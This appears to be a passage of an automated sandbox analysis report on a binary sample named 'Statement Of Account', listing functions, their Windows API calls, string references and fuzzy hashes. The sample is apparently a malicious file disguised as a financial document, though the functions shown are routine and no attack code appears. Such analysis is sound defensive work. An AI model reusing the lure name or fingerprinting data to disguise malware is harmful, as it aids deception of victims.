SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A

Strings

*.*, xrefs: 0045CE0E

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
String ID: *.*
API String ID: 1153243558-438819550
Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E

Function 00415C25 Relevance: 22.7, APIs: 15, Instructions: 236COMMON

Download Yara Rule

APIs

__get_daylight.LIBCMT ref: 00415C47
__invoke_watson.LIBCMT ref: 00415C56
__get_daylight.LIBCMT ref: 00415C62
__invoke_watson.LIBCMT ref: 00415C71
__get_daylight.LIBCMT ref: 00415C7D
__invoke_watson.LIBCMT ref: 00415C8C
__gmtime64_s.LIBCMT ref: 00415CBD
__gmtime64_s.LIBCMT ref: 00415CF3

Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
String ID:
API String ID: 1481289235-0
Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58

Function 00433BAC Relevance: 22.6, APIs: 15, Instructions: 79COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
LoadCursorW.USER32(00000000,00007F00), ref: 00433D06

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: CursorLoad
String ID:
API String ID: 3238433803-0
Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A

Function 00466999 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 312COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004669C4
_wcsncpy.LIBCMT ref: 00466A21
_wcsncpy.LIBCMT ref: 00466A4D

Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012

_wcstok.LIBCMT ref: 00466A90

Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9

_wcstok.LIBCMT ref: 00466B3F
_wcscpy.LIBCMT ref: 00466BC8
_wcslen.LIBCMT ref: 00466D1D
_memset.LIBCMT ref: 00466BEE

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

_wcslen.LIBCMT ref: 00466D4B
7516D1A0.COMDLG32(00000058), ref: 00466D9E

Strings

X, xrefs: 00466C1D
HH, xrefs: 004669F3

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _wcslen$_memset_wcscpy_wcsncpy_wcstok$7516__getptd
String ID: X$HH
API String ID: 2999436218-1944015008
Opcode ID: 148ffd08a53066c169799d7010fd2328abbb1436974d200da898f01e024381e3
Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
Opcode Fuzzy Hash: 148ffd08a53066c169799d7010fd2328abbb1436974d200da898f01e024381e3
Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B

Function 00460ABB Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
_wcslen.LIBCMT ref: 00460B00
__swprintf.LIBCMT ref: 00460B9E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
GetDlgCtrlID.USER32(?), ref: 00460CE6
GetWindowRect.USER32(?,?), ref: 00460D21
GetParent.USER32(?), ref: 00460D40
ScreenToClient.USER32(00000000), ref: 00460D47
GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB

Strings

%s%u, xrefs: 00460B98

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
String ID: %s%u
API String ID: 1899580136-679674701
Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6

Function 0047D5F6 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 210COMMON

Download Yara Rule

APIs

CoTaskMemFree.COMBASE(?), ref: 0047D6D3

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

StringFromCLSID.COMBASE(?,?), ref: 0047D6B5

Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012

StringFromIID.COMBASE(?,?), ref: 0047D7F0
CoTaskMemFree.COMBASE(?), ref: 0047D80A

Strings

0vH, xrefs: 0047D860
ToolBoxBitmap32, xrefs: 0047D719
inprocserver32, xrefs: 0047D725
Interface\, xrefs: 0047D810
HH, xrefs: 0047D62E
localserver32, xrefs: 0047D740
CLSID\, xrefs: 0047D6E1
ProgID, xrefs: 0047D74C

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: FreeFromStringTask_wcslen$_wcscpy
String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
API String ID: 2485709727-934586222
Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A

Function 0045DB3E Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 181COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0045DB6C
_memset.LIBCMT ref: 0045DB89
CoInitialize.OLE32(00000000), ref: 0045DB99
SHGetMalloc.SHELL32(?), ref: 0045DBA8
_wcscpy.LIBCMT ref: 0045DBDB
SHGetDesktopFolder.SHELL32(?,?), ref: 0045DC38
_wcscpy.LIBCMT ref: 0045DC5B
_wcscpy.LIBCMT ref: 0045DCC2
SHBrowseForFolderW.SHELL32 ref: 0045DCF5
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0045DD13
CoUninitialize.COMBASE ref: 0045DD6B

Strings

HH, xrefs: 0045DD4A

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
String ID: HH
API String ID: 3381189665-2761332787
Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A

Function 0045E41B Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463

Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71

LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
__swprintf.LIBCMT ref: 0045E4D9
_printf.LIBCMT ref: 0045E595
_printf.LIBCMT ref: 0045E5B7

Strings

Line %d (File "%s"):, xrefs: 0045E4BB, 0045E4CF
Error: , xrefs: 0045E556
%s (%d) : ==> %s:%s%s, xrefs: 0045E590
%s (%d) : ==> %s:, xrefs: 0045E5B2
^ ERROR , xrefs: 0045E523
HH, xrefs: 0045E4D4, 0045E4C0, 0045E4C4, 0045E4D8

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: LoadString_printf$__swprintf_wcslen
String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
API String ID: 3590180749-2894483878
Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A

Function 0045D971 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 140COMMON

Download Yara Rule

APIs

Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E

Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984

GetDriveTypeW.KERNEL32 ref: 0045DA30
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

Strings

close, xrefs: 0045D9DF
closed, xrefs: 0045D9F1, 0045DA19
type cdaudio alias cd wait, xrefs: 0045DA59
close cd wait, xrefs: 0045DAC6
set cd door , xrefs: 0045DA7C
open, xrefs: 0045DA03
open , xrefs: 0045DA3F
wait, xrefs: 0045DA94

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: SendString$_wcslen$BuffCharDriveLowerType
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 4013263488-4113822522
Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A

Function 00435A35 Relevance: 21.1, APIs: 14, Instructions: 136timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?,?,?,?,00449505,?,?,00000001,00000001), ref: 00435A48
_wcslen.LIBCMT ref: 00435A59
_wcslen.LIBCMT ref: 00435A9B
_wcsncpy.LIBCMT ref: 00435AB0
_wcslen.LIBCMT ref: 00435ACF
_wcsncpy.LIBCMT ref: 00435AE4
_wcslen.LIBCMT ref: 00435B02
_wcsncpy.LIBCMT ref: 00435A7D

Part of subcall function 00413431: __wcstoi64.LIBCMT ref: 00413427

_wcslen.LIBCMT ref: 00435B12
_wcsncpy.LIBCMT ref: 00435B2B
_wcslen.LIBCMT ref: 00435B4C
_wcsncpy.LIBCMT ref: 00435B61
_wcslen.LIBCMT ref: 00435B7E
_wcsncpy.LIBCMT ref: 00435B93

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
String ID:
API String ID: 228034949-0
Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA

Function 004334CA Relevance: 21.1, APIs: 14, Instructions: 132filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
GlobalLock.KERNEL32(00000000), ref: 00433523
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
GlobalUnlock.KERNEL32(00000000), ref: 0043353A
CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0043354F
OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
GlobalFree.KERNEL32(00000000), ref: 0043357B
GetObjectW.GDI32(?,00000018,?), ref: 004335A6
CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
DeleteObject.GDI32(?), ref: 00433603
SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3969911579-0
Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA

Function 0045510D Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00455127
GetMenuItemInfoW.USER32 ref: 00455146
DeleteMenu.USER32(?,?,00000000), ref: 004551B2
DeleteMenu.USER32(?,?,00000000), ref: 004551C8
GetMenuItemCount.USER32(?), ref: 004551D9
SetMenu.USER32(?,00000000), ref: 004551E7
DestroyMenu.USER32(?,?,00000000), ref: 004551F4
DrawMenuBar.USER32 ref: 00455207
DeleteObject.GDI32(?), ref: 0045564E
DeleteObject.GDI32(?), ref: 0045565C
DestroyCursor.USER32(?), ref: 0045566A

Strings

0, xrefs: 0045511F

Memory Dump Source

Source File: 00000000.00000002.2058137213.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2058113290.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.0000000000490000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2058137213.00000000004B5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060010084.00000000004B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060066331.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Statement Of Account.jbxd

Similarity

API ID: Menu$Delete$DestroyItemObject$CountCursorDrawInfo_memset
String ID: 0
API String ID: 3043981545-4108050209
Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9

Function 0045EEFF Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045EF6C
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045EF81
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045EF94
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045EFAB
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045EFB8
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045EFD2

Strings

status PlayMe mode, xrefs: 0045EF67
close PlayMe, xrefs: 0045EF7C, 0045EFB3
play PlayMe, xrefs: 0045EFCD
play PlayMe wait, xrefs: 0045EFA6
